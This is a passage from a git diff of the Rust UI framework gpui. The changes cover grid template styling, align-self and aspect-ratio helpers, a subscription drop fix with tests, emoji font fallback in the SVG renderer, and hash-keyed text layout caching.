+347,13 @@ impl Drop for ThreadTimings { } #[doc(hidden)] -#[allow(dead_code)] // Used by Linux and Windows dispatchers, not macOS pub fn add_task_timing(timing: TaskTiming) { THREAD_TIMINGS.with(|timings| { - let mut timings = timings.lock(); - - if let Some(last_timing) = timings.timings.back_mut() { - if last_timing.location == timing.location && last_timing.start == timing.start { - last_timing.end = timing.end; - return; - } - } - - timings.timings.push_back(timing); - timings.total_pushed += 1; + timings.lock().add_task_timing(timing); }); } + +#[doc(hidden)] +pub fn get_current_thread_task_timings() -> ThreadTaskTimings { + THREAD_TIMINGS.with(|timings| timings.lock().get_thread_task_timings()) +} diff --git a/crates/gpui/src/scene.rs b/crates/gpui/src/scene.rs index 7e0ffe017024cc7914885df9ea713a3ec3db820e..22b1bb468d84b2897b312c6fc8af00ee5c8523db 100644 --- a/crates/gpui/src/scene.rs +++ b/crates/gpui/src/scene.rs @@ -657,7 +657,7 @@ impl Default for TransformationMatrix { #[expect(missing_docs)] pub struct MonochromeSprite { pub order: DrawOrder, - pub pad: u32, // align to 8 bytes + pub pad: u32, pub bounds: Bounds, pub content_mask: ContentMask, pub color: Hsla, @@ -695,7 +695,7 @@ impl From for Primitive { #[expect(missing_docs)] pub struct PolychromeSprite { pub order: DrawOrder, - pub pad: u32, // align to 8 bytes + pub pad: u32, pub grayscale: bool, pub opacity: f32, pub bounds: Bounds, diff --git a/crates/gpui/src/style.rs b/crates/gpui/src/style.rs index dda49d990ac525f8b9f14b8a61a9c55c43e58e3b..97acc6f92bc2b3ba08a087486f21e193cb94e64d 100644 --- a/crates/gpui/src/style.rs +++ b/crates/gpui/src/style.rs @@ -138,6 +138,42 @@ impl ObjectFit { } } +/// The minimum size of a column or row in a grid layout +#[derive( + Copy, Clone, PartialEq, Eq, PartialOrd, Ord, Debug, Default, JsonSchema, Serialize, Deserialize, +)] +pub enum TemplateColumnMinSize { + /// The column size may be 0 + #[default] + Zero, + /// The column size can be determined by the min content + MinContent, + /// The column size can be determined by the max content + MaxContent, +} + +/// A simplified representation of the grid-template-* value +#[derive( + Copy, + Clone, + Refineable, + PartialEq, + Eq, + PartialOrd, + Ord, + Debug, + Default, + JsonSchema, + Serialize, + Deserialize, +)] +pub struct GridTemplate { + /// How this template directive should be repeated + pub repeat: u16, + /// The minimum size in the repeat(<>, minmax(_, 1fr)) equation + pub min_size: TemplateColumnMinSize, +} + /// The CSS styling that can be applied to an element via the `Styled` trait #[derive(Clone, Refineable, Debug)] #[refineable(Debug, PartialEq, Serialize, Deserialize, JsonSchema)] @@ -262,16 +298,12 @@ pub struct Style { pub opacity: Option, /// The grid columns of this element - /// Equivalent to the Tailwind `grid-cols-` - pub grid_cols: Option, - - /// The grid columns with min-content minimum sizing. - /// Unlike grid_cols, it won't shrink to width 0 in AvailableSpace::MinContent constraints. - pub grid_cols_min_content: Option, + /// Roughly equivalent to the Tailwind `grid-cols-` + pub grid_cols: Option, /// The row span of this element /// Equivalent to the Tailwind `grid-rows-` - pub grid_rows: Option, + pub grid_rows: Option, /// The grid location of this element pub grid_location: Option, @@ -790,7 +822,6 @@ impl Default for Style { opacity: None, grid_rows: None, grid_cols: None, - grid_cols_min_content: None, grid_location: None, #[cfg(debug_assertions)] diff --git a/crates/gpui/src/styled.rs b/crates/gpui/src/styled.rs index 3d0b86a9523f5ac05e51941c826e32379368c464..687e71a94ce4d19a1795baed3381e0452c376a89 100644 --- a/crates/gpui/src/styled.rs +++ b/crates/gpui/src/styled.rs @@ -1,9 +1,9 @@ use crate::{ - self as gpui, AbsoluteLength, AlignContent, AlignItems, BorderStyle, CursorStyle, + self as gpui, AbsoluteLength, AlignContent, AlignItems, AlignSelf, BorderStyle, CursorStyle, DefiniteLength, Display, Fill, FlexDirection, FlexWrap, Font, FontFeatures, FontStyle, - FontWeight, GridPlacement, Hsla, JustifyContent, Length, SharedString, StrikethroughStyle, - StyleRefinement, TextAlign, TextOverflow, TextStyleRefinement, UnderlineStyle, WhiteSpace, px, - relative, rems, + FontWeight, GridPlacement, GridTemplate, Hsla, JustifyContent, Length, SharedString, + StrikethroughStyle, StyleRefinement, TemplateColumnMinSize, TextAlign, TextOverflow, + TextStyleRefinement, UnderlineStyle, WhiteSpace, px, relative, rems, }; pub use gpui_macros::{ border_style_methods, box_shadow_style_methods, cursor_style_methods, margin_style_methods, @@ -278,6 +278,55 @@ pub trait Styled: Sized { self } + /// Sets how this specific element is aligned along the container's cross axis. + /// [Docs](https://tailwindcss.com/docs/align-self#start) + fn self_start(mut self) -> Self { + self.style().align_self = Some(AlignSelf::Start); + self + } + + /// Sets this element to align against the end of the container's cross axis. + /// [Docs](https://tailwindcss.com/docs/align-self#end) + fn self_end(mut self) -> Self { + self.style().align_self = Some(AlignSelf::End); + self + } + + /// Sets this element to align against the start of the container's cross axis. + /// [Docs](https://tailwindcss.com/docs/align-self#start) + fn self_flex_start(mut self) -> Self { + self.style().align_self = Some(AlignSelf::FlexStart); + self + } + + /// Sets this element to align against the end of the container's cross axis. + /// [Docs](https://tailwindcss.com/docs/align-self#end) + fn self_flex_end(mut self) -> Self { + self.style().align_self = Some(AlignSelf::FlexEnd); + self + } + + /// Sets this element to align along the center of the container's cross axis. + /// [Docs](https://tailwindcss.com/docs/align-self#center) + fn self_center(mut self) -> Self { + self.style().align_self = Some(AlignSelf::Center); + self + } + + /// Sets this element to align along the baseline of the container's cross axis. + /// [Docs](https://tailwindcss.com/docs/align-self#baseline) + fn self_baseline(mut self) -> Self { + self.style().align_self = Some(AlignSelf::Baseline); + self + } + + /// Sets this element to stretch to fill the available space along the container's cross axis. + /// [Docs](https://tailwindcss.com/docs/align-self#stretch) + fn self_stretch(mut self) -> Self { + self.style().align_self = Some(AlignSelf::Stretch); + self + } + /// Sets the element to justify flex items against the start of the container's main axis. /// [Docs](https://tailwindcss.com/docs/justify-content#start) fn justify_start(mut self) -> Self { @@ -384,6 +433,20 @@ pub trait Styled: Sized { self } + /// Sets the aspect ratio of the element. + /// [Docs](https://tailwindcss.com/docs/aspect-ratio) + fn aspect_ratio(mut self, ratio: f32) -> Self { + self.style().aspect_ratio = Some(ratio); + self + } + + /// Sets the aspect ratio of the element to 1/1 – equal width and height. + /// [Docs](https://tailwindcss.com/docs/aspect-ratio) + fn aspect_square(mut self) -> Self { + self.style().aspect_ratio = Some(1.0); + self + } + /// Sets the background color of the element. fn bg(mut self, fill: F) -> Self where @@ -648,20 +711,38 @@ pub trait Styled: Sized { /// Sets the grid columns of this element. fn grid_cols(mut self, cols: u16) -> Self { - self.style().grid_cols = Some(cols); + self.style().grid_cols = Some(GridTemplate { + repeat: cols, + min_size: TemplateColumnMinSize::Zero, + }); self } /// Sets the grid columns with min-content minimum sizing. /// Unlike grid_cols, it won't shrink to width 0 in AvailableSpace::MinContent constraints. fn grid_cols_min_content(mut self, cols: u16) -> Self { - self.style().grid_cols_min_content = Some(cols); + self.style().grid_cols = Some(GridTemplate { + repeat: cols, + min_size: TemplateColumnMinSize::MinContent, + }); + self + } + + /// Sets the grid columns with max-content maximum sizing for content-based column widths. + fn grid_cols_max_content(mut self, cols: u16) -> Self { + self.style().grid_cols = Some(GridTemplate { + repeat: cols, + min_size: TemplateColumnMinSize::MaxContent, + }); self } /// Sets the grid rows of this element. fn grid_rows(mut self, rows: u16) -> Self { - self.style().grid_rows = Some(rows); + self.style().grid_rows = Some(GridTemplate { + repeat: rows, + min_size: TemplateColumnMinSize::Zero, + }); self } diff --git a/crates/gpui/src/subscription.rs b/crates/gpui/src/subscription.rs index cf44b68d2bcbf7ca7d02c4b9e956f15079f8bdb6..b0c55a3966192ea0a15011e3cd2d14498c680c46 100644 --- a/crates/gpui/src/subscription.rs +++ b/crates/gpui/src/subscription.rs @@ -1,9 +1,8 @@ -use collections::{BTreeMap, BTreeSet}; +use collections::BTreeMap; use gpui_util::post_inc; use std::{ cell::{Cell, RefCell}, fmt::Debug, - mem, rc::Rc, }; @@ -19,12 +18,12 @@ impl Clone for SubscriberSet { struct SubscriberSetState { subscribers: BTreeMap>>>, - dropped_subscribers: BTreeSet<(EmitterKey, usize)>, next_subscriber_id: usize, } struct Subscriber { active: Rc>, + dropped: Rc>, callback: Callback, } @@ -36,7 +35,6 @@ where pub fn new() -> Self { Self(Rc::new(RefCell::new(SubscriberSetState { subscribers: Default::default(), - dropped_subscribers: Default::default(), next_subscriber_id: 0, }))) } @@ -51,6 +49,7 @@ where callback: Callback, ) -> (Subscription, impl FnOnce() + use) { let active = Rc::new(Cell::new(false)); + let dropped = Rc::new(Cell::new(false)); let mut lock = self.0.borrow_mut(); let subscriber_id = post_inc(&mut lock.next_subscriber_id); lock.subscribers @@ -61,6 +60,7 @@ where subscriber_id, Subscriber { active: active.clone(), + dropped: dropped.clone(), callback, }, ); @@ -68,9 +68,10 @@ where let subscription = Subscription { unsubscribe: Some(Box::new(move || { + dropped.set(true); + let mut lock = this.borrow_mut(); let Some(subscribers) = lock.subscribers.get_mut(&emitter_key) else { - // remove was called with this emitter_key return; }; @@ -79,14 +80,7 @@ where if subscribers.is_empty() { lock.subscribers.remove(&emitter_key); } - return; } - - // We didn't manage to remove the subscription, which means it was dropped - // while invoking the callback. Mark it as dropped so that we can remove it - // later. - lock.dropped_subscribers - .insert((emitter_key, subscriber_id)); })), }; (subscription, move || active.set(true)) @@ -128,11 +122,14 @@ where }; subscribers.retain(|_, subscriber| { - if subscriber.active.get() { - f(&mut subscriber.callback) - } else { - true + if !subscriber.active.get() { + return true; } + if subscriber.dropped.get() { + return false; + } + let keep = f(&mut subscriber.callback); + keep && !subscriber.dropped.get() }); let mut lock = self.0.borrow_mut(); @@ -141,12 +138,6 @@ where subscribers.extend(new_subscribers); } - // Remove any dropped subscriptions that were dropped while invoking the callback. - for (dropped_emitter, dropped_subscription_id) in mem::take(&mut lock.dropped_subscribers) { - debug_assert_eq!(*emitter, dropped_emitter); - subscribers.remove(&dropped_subscription_id); - } - if !subscribers.is_empty() { lock.subscribers.insert(emitter.clone(), Some(subscribers)); } @@ -207,3 +198,154 @@ impl std::fmt::Debug for Subscription { f.debug_struct("Subscription").finish() } } + +#[cfg(test)] +mod tests { + use super::*; + use crate::{Global, TestApp}; + + #[test] + fn test_unsubscribe_during_callback_with_insert() { + struct TestGlobal; + impl Global for TestGlobal {} + + let mut app = TestApp::new(); + app.set_global(TestGlobal); + + let observer_a_count = Rc::new(Cell::new(0usize)); + let observer_b_count = Rc::new(Cell::new(0usize)); + + let sub_a: Rc>> = Default::default(); + let sub_b: Rc>> = Default::default(); + + // Observer A fires first (lower subscriber_id). It drops itself and + // inserts a new observer for the same global. + *sub_a.borrow_mut() = Some(app.update({ + let count = observer_a_count.clone(); + let sub_a = sub_a.clone(); + move |cx| { + cx.observe_global::(move |cx| { + count.set(count.get() + 1); + sub_a.borrow_mut().take(); + cx.observe_global::(|_| {}).detach(); + }) + } + })); + + // Observer B fires second. It just drops itself. + *sub_b.borrow_mut() = Some(app.update({ + let count = observer_b_count.clone(); + let sub_b = sub_b.clone(); + move |cx| { + cx.observe_global::(move |_cx| { + count.set(count.get() + 1); + sub_b.borrow_mut().take(); + }) + } + })); + + // Both fire once. + app.update(|cx| cx.set_global(TestGlobal)); + assert_eq!(observer_a_count.get(), 1); + assert_eq!(observer_b_count.get(), 1); + + // Neither should fire again — both dropped their subscriptions. + app.update(|cx| cx.set_global(TestGlobal)); + assert_eq!(observer_a_count.get(), 1); + assert_eq!(observer_b_count.get(), 1, "orphaned subscriber fired again"); + } + + #[test] + fn test_callback_dropped_by_earlier_callback_does_not_fire() { + struct TestGlobal; + impl Global for TestGlobal {} + + let mut app = TestApp::new(); + app.set_global(TestGlobal); + + let observer_b_count = Rc::new(Cell::new(0usize)); + let sub_b: Rc>> = Default::default(); + + // Observer A fires first and drops B's subscription. + app.update({ + let sub_b = sub_b.clone(); + move |cx| { + cx.observe_global::(move |_cx| { + sub_b.borrow_mut().take(); + }) + .detach(); + } + }); + + // Observer B fires second — but A already dropped it. + *sub_b.borrow_mut() = Some(app.update({ + let count = observer_b_count.clone(); + move |cx| { + cx.observe_global::(move |_cx| { + count.set(count.get() + 1); + }) + } + })); + + app.update(|cx| cx.set_global(TestGlobal)); + assert_eq!( + observer_b_count.get(), + 0, + "B should not fire — A dropped its subscription" + ); + } + + #[test] + fn test_self_drop_during_callback() { + struct TestGlobal; + impl Global for TestGlobal {} + + let mut app = TestApp::new(); + app.set_global(TestGlobal); + + let count = Rc::new(Cell::new(0usize)); + let sub: Rc>> = Default::default(); + + *sub.borrow_mut() = Some(app.update({ + let count = count.clone(); + let sub = sub.clone(); + move |cx| { + cx.observe_global::(move |_cx| { + count.set(count.get() + 1); + sub.borrow_mut().take(); + }) + } + })); + + app.update(|cx| cx.set_global(TestGlobal)); + assert_eq!(count.get(), 1); + + app.update(|cx| cx.set_global(TestGlobal)); + assert_eq!(count.get(), 1, "should not fire after self-drop"); + } + + #[test] + fn test_subscription_drop() { + struct TestGlobal; + impl Global for TestGlobal {} + + let mut app = TestApp::new(); + app.set_global(TestGlobal); + + let count = Rc::new(Cell::new(0usize)); + + let subscription = app.update({ + let count = count.clone(); + move |cx| { + cx.observe_global::(move |_cx| { + count.set(count.get() + 1); + }) + } + }); + + drop(subscription); + + app.update(|cx| cx.set_global(TestGlobal)); + assert_eq!(count.get(), 0, "should not fire after drop"); + } +} diff --git a/crates/gpui/src/svg_renderer.rs b/crates/gpui/src/svg_renderer.rs index f82530f8d10fab074dd5e116114cf028a8a19cfe..8653ab9b162031772ab29367b60ff988e33cd823 100644 --- a/crates/gpui/src/svg_renderer.rs +++ b/crates/gpui/src/svg_renderer.rs @@ -10,6 +10,73 @@ use std::{ sync::{Arc, LazyLock}, }; +#[cfg(target_os = "macos")] +const EMOJI_FONT_FAMILIES: &[&str] = &["Apple Color Emoji", ".AppleColorEmojiUI"]; + +#[cfg(target_os = "windows")] +const EMOJI_FONT_FAMILIES: &[&str] = &["Segoe UI Emoji", "Segoe UI Symbol"]; + +#[cfg(any(target_os = "linux", target_os = "freebsd"))] +const EMOJI_FONT_FAMILIES: &[&str] = &[ + "Noto Color Emoji", + "Emoji One", + "Twitter Color Emoji", + "JoyPixels", +]; + +#[cfg(not(any( + target_os = "macos", + target_os = "windows", + target_os = "linux", + target_os = "freebsd", +)))] +const EMOJI_FONT_FAMILIES: &[&str] = &[]; + +fn is_emoji_presentation(c: char) -> bool { + static EMOJI_PRESENTATION_REGEX: LazyLock = + LazyLock::new(|| regex::Regex::new("\\p{Emoji_Presentation}").unwrap()); + let mut buf = [0u8; 4]; + EMOJI_PRESENTATION_REGEX.is_match(c.encode_utf8(&mut buf)) +} + +fn font_has_char(db: &usvg::fontdb::Database, id: usvg::fontdb::ID, ch: char) -> bool { + db.with_face_data(id, |font_data, face_index| { + ttf_parser::Face::parse(font_data, face_index) + .ok() + .and_then(|face| face.glyph_index(ch)) + .is_some() + }) + .unwrap_or(false) +} + +fn select_emoji_font( + ch: char, + fonts: &[usvg::fontdb::ID], + db: &usvg::fontdb::Database, + families: &[&str], +) -> Option { + for family_name in families { + let query = usvg::fontdb::Query { + families: &[usvg::fontdb::Family::Name(family_name)], + weight: usvg::fontdb::Weight(400), + stretch: usvg::fontdb::Stretch::Normal, + style: usvg::fontdb::Style::Normal, + }; + + let Some(id) = db.query(&query) else { + continue; + }; + + if fonts.contains(&id) || !font_has_char(db, id, ch) { + continue; + } + + return Some(id); + } + + None +} + /// When rendering SVGs, we render them at twice the size to get a higher-quality result. pub const SMOOTH_SVG_SCALE_FACTOR: f32 = 2.; @@ -52,10 +119,23 @@ impl SvgRenderer { default_font_resolver(font, db) }, ); + let default_fallback_selection = usvg::FontResolver::default_fallback_selector(); + let fallback_selection = Box::new( + move |ch: char, fonts: &[usvg::fontdb::ID], db: &mut Arc| { + if is_emoji_presentation(ch) { + if let Some(id) = select_emoji_font(ch, fonts, db.as_ref(), EMOJI_FONT_FAMILIES) + { + return Some(id); + } + } + + default_fallback_selection(ch, fonts, db) + }, + ); let options = usvg::Options { font_resolver: usvg::FontResolver { select_font: font_resolver, - select_fallback: usvg::FontResolver::default_fallback_selector(), + select_fallback: fallback_selection, }, ..Default::default() }; @@ -70,7 +150,6 @@ impl SvgRenderer { &self, bytes: &[u8], scale_factor: f32, - to_brga: bool, ) -> Result, usvg::Error> { self.render_pixmap( bytes, @@ -81,10 +160,8 @@ impl SvgRenderer { image::ImageBuffer::from_raw(pixmap.width(), pixmap.height(), pixmap.take()) .unwrap(); - if to_brga { - for pixel in buffer.chunks_exact_mut(4) { - swap_rgba_pa_to_bgra(pixel); - } + for pixel in buffer.chunks_exact_mut(4) { + swap_rgba_pa_to_bgra(pixel); } let mut image = RenderImage::new(SmallVec::from_const([Frame::new(buffer)])); @@ -148,3 +225,73 @@ impl SvgRenderer { Ok(pixmap) } } + +#[cfg(test)] +mod tests { + use super::*; + + const IBM_PLEX_REGULAR: &[u8] = + include_bytes!("../../../assets/fonts/ibm-plex-sans/IBMPlexSans-Regular.ttf"); + const LILEX_REGULAR: &[u8] = include_bytes!("../../../assets/fonts/lilex/Lilex-Regular.ttf"); + + #[test] + fn test_is_emoji_presentation() { + let cases = [ + ("a", false), + ("Z", false), + ("1", false), + ("#", false), + ("*", false), + ("漢", false), + ("中", false), + ("カ", false), + ("©", false), + ("♥", false), + ("😀", true), + ("✅", true), + ("🇺🇸", true), + // SVG fallback is not cluster-aware yet + ("©️", false), + ("♥️", false), + ("1️⃣", false), + ]; + for (s, expected) in cases { + assert_eq!( + is_emoji_presentation(s.chars().next().unwrap()), + expected, + "for char {:?}", + s + ); + } + } + + #[test] + fn test_select_emoji_font_skips_family_without_glyph() { + let mut db = usvg::fontdb::Database::new(); + + db.load_font_data(IBM_PLEX_REGULAR.to_vec()); + db.load_font_data(LILEX_REGULAR.to_vec()); + + let ibm_plex_sans = db + .query(&usvg::fontdb::Query { + families: &[usvg::fontdb::Family::Name("IBM Plex Sans")], + weight: usvg::fontdb::Weight(400), + stretch: usvg::fontdb::Stretch::Normal, + style: usvg::fontdb::Style::Normal, + }) + .unwrap(); + let lilex = db + .query(&usvg::fontdb::Query { + families: &[usvg::fontdb::Family::Name("Lilex")], + weight: usvg::fontdb::Weight(400), + stretch: usvg::fontdb::Stretch::Normal, + style: usvg::fontdb::Style::Normal, + }) + .unwrap(); + let selected = select_emoji_font('│', &[], &db, &["IBM Plex Sans", "Lilex"]).unwrap(); + + assert_eq!(selected, lilex); + assert!(!font_has_char(&db, ibm_plex_sans, '│')); + assert!(font_has_char(&db, selected, '│')); + } +} diff --git a/crates/gpui/src/taffy.rs b/crates/gpui/src/taffy.rs index 99a50b87c8aa9f40a7694f1c2084b10f6d0a9315..094b65553d9abac1c0b32fc44333fddde12ed64c 100644 --- a/crates/gpui/src/taffy.rs +++ b/crates/gpui/src/taffy.rs @@ -1,6 +1,6 @@ use crate::{ - AbsoluteLength, App, Bounds, DefiniteLength, Edges, Length, Pixels, Point, Size, Style, Window, - point, size, + AbsoluteLength, App, Bounds, DefiniteLength, Edges, GridTemplate, Length, Pixels, Point, Size, + Style, Window, point, size, }; use collections::{FxHashMap, FxHashSet}; use stacksafe::{StackSafe, stacksafe}; @@ -8,7 +8,7 @@ use std::{fmt::Debug, ops::Range}; use taffy::{ TaffyTree, TraversePartialTree as _, geometry::{Point as TaffyPoint, Rect as TaffyRect, Size as TaffySize}, - prelude::min_content, + prelude::{max_content, min_content}, style::AvailableSpace as TaffyAvailableSpace, tree::NodeId, }; @@ -308,19 +308,31 @@ impl ToTaffy for Style { } fn to_grid_repeat( - unit: &Option, + unit: &Option, ) -> Vec> { - // grid-template-columns: repeat(, minmax(0, 1fr)); - unit.map(|count| vec![repeat(count, vec![minmax(length(0.0), fr(1.0))])]) - .unwrap_or_default() - } - - fn to_grid_repeat_min_content( - unit: &Option, - ) -> Vec> { - // grid-template-columns: repeat(, minmax(min-content, 1fr)); - unit.map(|count| vec![repeat(count, vec![minmax(min_content(), fr(1.0))])]) - .unwrap_or_default() + unit.map(|template| { + match template.min_size { + // grid-template-*: repeat(, minmax(0, 1fr)); + crate::TemplateColumnMinSize::Zero => { + vec![repeat(template.repeat, vec![minmax(length(0.0), fr(1.0))])] + } + // grid-template-*: repeat(, minmax(min-content, 1fr)); + crate::TemplateColumnMinSize::MinContent => { + vec![repeat( + template.repeat, + vec![minmax(min_content(), fr(1.0))], + )] + } + // grid-template-*: repeat(, minmax(0, max-content)) + crate::TemplateColumnMinSize::MaxContent => { + vec![repeat( + template.repeat, + vec![minmax(length(0.0), max_content())], + )] + } + } + }) + .unwrap_or_default() } taffy::style::Style { @@ -347,11 +359,7 @@ impl ToTaffy for Style { flex_grow: self.flex_grow, flex_shrink: self.flex_shrink, grid_template_rows: to_grid_repeat(&self.grid_rows), - grid_template_columns: if self.grid_cols_min_content.is_some() { - to_grid_repeat_min_content(&self.grid_cols_min_content) - } else { - to_grid_repeat(&self.grid_cols) - }, + grid_template_columns: to_grid_repeat(&self.grid_cols), grid_row: self .grid_location .as_ref() diff --git a/crates/gpui/src/test.rs b/crates/gpui/src/test.rs index 9e76d97e97e941121417d872e8c6f596cf658e20..ddcc3d27bd04d2fd82b3367a2fee6930e86ef356 100644 --- a/crates/gpui/src/test.rs +++ b/crates/gpui/src/test.rs @@ -27,12 +27,43 @@ //! ``` use crate::{Entity, Subscription, TestAppContext, TestDispatcher}; use futures::StreamExt as _; +use proptest::prelude::{Just, Strategy, any}; use std::{ env, - panic::{self, RefUnwindSafe}, + panic::{self, RefUnwindSafe, UnwindSafe}, pin::Pin, }; +/// Strategy injected into `#[gpui::property_test]` tests to control the seed +/// given to the scheduler. Doesn't shrink, since all scheduler seeds are +/// equivalent in complexity. If `$SEED` is set, it always uses that value. +pub fn seed_strategy() -> impl Strategy { + match std::env::var("SEED") { + Ok(val) => Just(val.parse().unwrap()).boxed(), + Err(_) => any::().no_shrink().boxed(), + } +} + +/// Similar to [`run_test`], but only runs the callback once, allowing +/// [`FnOnce`] callbacks. This is intended for use with the +/// `gpui::property_test` macro and generally should not be used directly. +/// +/// Doesn't support many features of [`run_test`], since these are provided by +/// proptest. +pub fn run_test_once(seed: u64, test_fn: Box) { + let result = panic::catch_unwind(|| { + let dispatcher = TestDispatcher::new(seed); + let scheduler = dispatcher.scheduler().clone(); + test_fn(dispatcher); + scheduler.end_test(); + }); + + match result { + Ok(()) => {} + Err(e) => panic::resume_unwind(e), + } +} + /// Run the given test function with the configured parameters. /// This is intended for use with the `gpui::test` macro /// and generally should not be used directly. diff --git a/crates/gpui/src/text_system.rs b/crates/gpui/src/text_system.rs index 43982b2666bde8210f770419623cc0b9afd6e2af..b62a0ad6fd4f885b127144bd66e8e3e41747d889 100644 --- a/crates/gpui/src/text_system.rs +++ b/crates/gpui/src/text_system.rs @@ -63,7 +63,8 @@ pub struct TextSystem { } impl TextSystem { - pub(crate) fn new(platform_text_system: Arc) -> Self { + /// Create a new TextSystem with the given platform text system. + pub fn new(platform_text_system: Arc) -> Self { TextSystem { platform_text_system, font_metrics: RwLock::default(), @@ -372,7 +373,8 @@ pub struct WindowTextSystem { } impl WindowTextSystem { - pub(crate) fn new(text_system: Arc) -> Self { + /// Create a new WindowTextSystem with the given TextSystem. + pub fn new(text_system: Arc) -> Self { Self { line_layout_cache: LineLayoutCache::new(text_system.platform_text_system.clone()), text_system, @@ -438,6 +440,74 @@ impl WindowTextSystem { } } + /// Shape the given line using a caller-provided content hash as the cache key. + /// + /// This enables cache hits without materializing a contiguous `SharedString` for the text. + /// If the cache misses, `materialize_text` is invoked to produce the `SharedString` for shaping. + /// + /// Contract (caller enforced): + /// - Same `text_hash` implies identical text content (collision risk accepted by caller). + /// - `text_len` should be the UTF-8 byte length of the text (helps reduce accidental collisions). + /// + /// Like [`Self::shape_line`], this must be used only for single-line text (no `\n`). + pub fn shape_line_by_hash( + &self, + text_hash: u64, + text_len: usize, + font_size: Pixels, + runs: &[TextRun], + force_width: Option, + materialize_text: impl FnOnce() -> SharedString, + ) -> ShapedLine { + let mut decoration_runs = SmallVec::<[DecorationRun; 32]>::new(); + for run in runs { + if let Some(last_run) = decoration_runs.last_mut() + && last_run.color == run.color + && last_run.underline == run.underline + && last_run.strikethrough == run.strikethrough + && last_run.background_color == run.background_color + { + last_run.len += run.len as u32; + continue; + } + decoration_runs.push(DecorationRun { + len: run.len as u32, + color: run.color, + background_color: run.background_color, + underline: run.underline, + strikethrough: run.strikethrough, + }); + } + + let mut used_force_width = force_width; + let layout = self.layout_line_by_hash( + text_hash, + text_len, + font_size, + runs, + used_force_width, + || { + let text = materialize_text(); + debug_assert!( + text.find('\n').is_none(), + "text argument should not contain newlines" + ); + text + }, + ); + + // We only materialize actual text on cache miss; on hit we avoid allocations. + // Since `ShapedLine` carries a `SharedString`, use an empty placeholder for hits. + // NOTE: Callers must not rely on `ShapedLine.text` for content when using this API. + let text: SharedString = SharedString::new_static(""); + + ShapedLine { + layout, + text, + decoration_runs, + } + } + /// Shape a multi line string of text, at the given font_size, for painting to the screen. /// Subsets of the text can be styled independently with the `runs` parameter. /// If `wrap_width` is provided, the line breaks will be adjusted to fit within the given width. @@ -627,6 +697,130 @@ impl WindowTextSystem { layout } + + /// Probe the line layout cache using a caller-provided content hash, without allocating. + /// + /// Returns `Some(layout)` if the layout is already cached in either the current frame + /// or the previous frame. Returns `None` if it is not cached. + /// + /// Contract (caller enforced): + /// - Same `text_hash` implies identical text content (collision risk accepted by caller). + /// - `text_len` should be the UTF-8 byte length of the text (helps reduce accidental collisions). + pub fn try_layout_line_by_hash( + &self, + text_hash: u64, + text_len: usize, + font_size: Pixels, + runs: &[TextRun], + force_width: Option, + ) -> Option> { + let mut last_run = None::<&TextRun>; + let mut font_runs = self.font_runs_pool.lock().pop().unwrap_or_default(); + font_runs.clear(); + + for run in runs.iter() { + let decoration_changed = if let Some(last_run) = last_run + && last_run.color == run.color + && last_run.underline == run.underline + && last_run.strikethrough == run.strikethrough + // we do not consider differing background color relevant, as it does not affect glyphs + // && last_run.background_color == run.background_color + { + false + } else { + last_run = Some(run); + true + }; + + let font_id = self.resolve_font(&run.font); + if let Some(font_run) = font_runs.last_mut() + && font_id == font_run.font_id + && !decoration_changed + { + font_run.len += run.len; + } else { + font_runs.push(FontRun { + len: run.len, + font_id, + }); + } + } + + let layout = self.line_layout_cache.try_layout_line_by_hash( + text_hash, + text_len, + font_size, + &font_runs, + force_width, + ); + + self.font_runs_pool.lock().push(font_runs); + + layout + } + + /// Layout the given line of text using a caller-provided content hash as the cache key. + /// + /// This enables cache hits without materializing a contiguous `SharedString` for the text. + /// If the cache misses, `materialize_text` is invoked to produce the `SharedString` for shaping. + /// + /// Contract (caller enforced): + /// - Same `text_hash` implies identical text content (collision risk accepted by caller). + /// - `text_len` should be the UTF-8 byte length of the text (helps reduce accidental collisions). + pub fn layout_line_by_hash( + &self, + text_hash: u64, + text_len: usize, + font_size: Pixels, + runs: &[TextRun], + force_width: Option, + materialize_text: impl FnOnce() -> SharedString, + ) -> Arc { + let mut last_run = None::<&TextRun>; + let mut font_runs = self.font_runs_pool.lock().pop().unwrap_or_default(); + font_runs.clear(); + + for run in runs.iter() { + let decoration_changed = if let Some(last_run) = last_run + && last_run.color == run.color + && last_run.underline == run.underline + && last_run.strikethrough == run.strikethrough + // we do not consider differing background color relevant, as it does not affect glyphs + // && last_run.background_color == run.background_color + { + false + } else { + last_run = Some(run); + true + }; + + let font_id = self.resolve_font(&run.font); + if let Some(font_run) = font_runs.last_mut() + && font_id == font_run.font_id + && !decoration_changed + { + font_run.len += run.len; + } else { + font_runs.push(FontRun { + len: run.len, + font_id, + }); + } + } + + let layout = self.line_layout_cache.layout_line_by_hash( + text_hash, + text_len, + font_size, + &font_runs, + force_width, + materialize_text, + ); + + self.font_runs_pool.lock().push(font_runs); + + layout + } } #[derive(Hash, Eq, PartialEq)] @@ -802,6 +996,11 @@ impl TextRun { #[repr(C)] pub struct GlyphId(pub u32); +/// Parameters for rendering a glyph, used as cache keys for raster bounds. +/// +/// This struct identifies a specific glyph rendering configuration including +/// font, size, subpixel positioning, and scale factor. It's used to look up +/// cached raster bounds and sprite atlas entries. #[derive(Clone, Debug, PartialEq)] #[expect(missing_docs)] pub struct RenderGlyphParams { diff --git a/crates/gpui/src/text_system/line.rs b/crates/gpui/src/text_system/line.rs index c87e051ad3b4e5fc86d17ad0e6168553108175fa..7b5714188ff97d0169806ac5da9f039f9be2c16a 100644 --- a/crates/gpui/src/text_system/line.rs +++ b/crates/gpui/src/text_system/line.rs @@ -1,12 +1,24 @@ use crate::{ - App, Bounds, Half, Hsla, LineLayout, Pixels, Point, Result, SharedString, StrikethroughStyle, - TextAlign, UnderlineStyle, Window, WrapBoundary, WrappedLineLayout, black, fill, point, px, - size, + App, Bounds, DevicePixels, Half, Hsla, LineLayout, Pixels, Point, RenderGlyphParams, Result, + ShapedGlyph, ShapedRun, SharedString, StrikethroughStyle, TextAlign, UnderlineStyle, Window, + WrapBoundary, WrappedLineLayout, black, fill, point, px, size, }; use derive_more::{Deref, DerefMut}; use smallvec::SmallVec; use std::sync::Arc; +/// Pre-computed glyph data for efficient painting without per-glyph cache lookups. +/// +/// This is produced by `ShapedLine::compute_glyph_raster_data` during prepaint +/// and consumed by `ShapedLine::paint_with_raster_data` during paint. +#[derive(Clone, Debug)] +pub struct GlyphRasterData { + /// The raster bounds for each glyph, in paint order. + pub bounds: Vec>, + /// The render params for each glyph (needed for sprite atlas lookup). + pub params: Vec, +} + /// Set the text decoration for a run of text. #[derive(Debug, Clone)] pub struct DecorationRun { @@ -44,6 +56,14 @@ impl ShapedLine { self.layout.len } + /// The width of the shaped line in pixels. + /// + /// This is the glyph 